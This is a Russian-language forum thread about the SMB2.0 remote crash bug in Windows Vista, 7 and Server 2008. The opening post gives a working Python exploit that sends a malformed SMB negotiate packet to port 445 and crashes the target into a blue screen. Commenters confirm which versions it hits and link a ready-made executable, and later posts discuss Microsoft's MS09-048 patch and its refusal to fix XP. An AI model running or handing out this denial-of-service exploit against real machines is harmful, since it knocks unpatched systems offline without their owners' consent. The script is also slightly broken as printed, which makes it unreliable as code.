програмка на пятоне или вендекапец для любой машины под cвистой и выше

Barbie29

http://lor-ng.org/message.php?newsid=4287
 
Как оказалось, виндовая реализация SMB2.0, поставляемая со всеми новыми поделками микросовта начиная с висты, выносит систему в BSOD при получении [не]правильно сформированного запроса на инициализацию сеанса связи (т.е. привилегии на этой стадии не нужны).
Системы, подверженные капцу: Windows Vista/7 All (64b/32b|SP1/SP2 проапдейченные до последних версий) и, возможно, Win Server 2008 поскольку тот использует SMB2.0 (не тестировался).
Код:
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket
s.connect(host)
s.send(buff)
s.close

 

fufa58

Windows Vista/7 All (64b/32b|SP1/SP2 проапдейченные до последних версий)
ходят слухи, что на 7 RTM не работает. слухи не проверялись.

okis

Windows Vista/7 All (64b/32b|SP1/SP2 проапдейченные до последних версий)
определённо работает на server 2008; на windows 7 rtm — нет (тока что проверил).

stm4836248

R2?

okis

Нет, 6.0 SP2.

Plok2008

Вот уже написали ГУИ для винды
http://just4lulz.com/smbnuke.exe
:)

otets-mihail

Сейчас еще на форуме кнопочку сделаю.

yroslavasako

определённо работает на server 2008; на windows 7 rtm — нет (тока что проверил).
кто же в своём уме самбу наружу оставляет? Наружу должно ftp торчать или AFS, если нужна именно fs

fufa58

Ахнуда, внимание, вопрос: какого черта самба-сервер может порушить ядро?
отвечает пенартур.

otvertka07

поздновато запостил, патч раньше появился http://www.microsoft.com/technet/security/Bulletin/MS09-048....

yroslavasako

Ахнуда, внимание, вопрос: какого черта самба-сервер может порушить ядро?
отвечает пенартур.
А как ещё убедить народ переходить на win7?

Serab

:lol:, зачет!

Barbie29

поздновато запостил, патч раньше появился http://www.microsoft.com/technet/security/Bulletin/MS09-048....
а для w2k & windowsXP фигвам называется:
К удивлению специалистов по безопасности, компания Microsoft отказалась выпускать патч для недавно обнаруженной уязвимости TCP/IP в Windows XP и Windows 2000. Один из ведущих менеджеров по безопасности программ Microsoft Эдриан Стоун заявил, что этот фрагмент исходников слишком стар, имеет возраст от 12 до 15 лет, и разобраться в коде на этом уровне «просто нереально» [backporting that level of code is essentially not feasible].
Две уязвимости в стеке TCP/IP были обнаружены 8 сентября. Уязвимость затрагивает также Windows Vista, Windows Server 2003 и Windows Server 2008. Для трёх упомянутых систем вышел апдейт MS09-048, а вот к Windows 2000 и Windows XP патча ждать не стоит. Для защиты от вредоносных TCP/IP-пакетов пользователям Windows XP рекомендуется воспользоваться функционалом встроенного файрвола.
Стоит отметить, что на сегодняшний день Windows XP — самая популярная в мире ОС. По условиям пользовательского соглашения, Microsoft обязана выпускать апдейты безопасности для Windows XP вплоть до апреля 2014 г..
Отказ устранять найденную уязвимость для системы, которая находится на поддержке — довольно редкое явление. Стоун сказал, что последний раз Microsoft шла на такой шаг в марте 2003 года с Windows NT 4.0.
http://www.securitylab.ru/news/385475.php

kruzer25

Что интересно, в самом бюллетене для WS2k3 и WS2k указана важность Important (для висты и WS2k8 - Critical но для XP - всего лишь Low.
Возможно, в XP эта уязвимость по каким-то причинам не приводит к таким последствиям, как в других версиях?

dgaf

"Low" уязвимости можно не фиксить если влом?
Очевидно, что их условный impact зависит от их желания фиксить ошибку и от "цели" ОС (сервер\десктоп).
Ошибка в tcp-стеке одна и та же, как она может быть и low и critical?
Although the two bugs can be exploited on Windows 2000 and XP, Microsoft downplayed their impact. "A system would become unresponsive due to memory consumption ... [but] a successful attack requires a sustained flood of specially crafted TCP packets, and the system will recover once the flood ceases."
Действительно, нафига такое править. Десктоп не сервер, юзер потерпит.

kruzer25

Ошибка в tcp-стеке одна и та же, как она может быть и low и critical?
Одни и те же ошибки могут иметь разную степень серьёзности на по-разному настроенных системах.

dgaf

Разве огнестенка включена по-умолчанию только в ХР?
Оставить комментарий
Имя или ник:
Комментарий: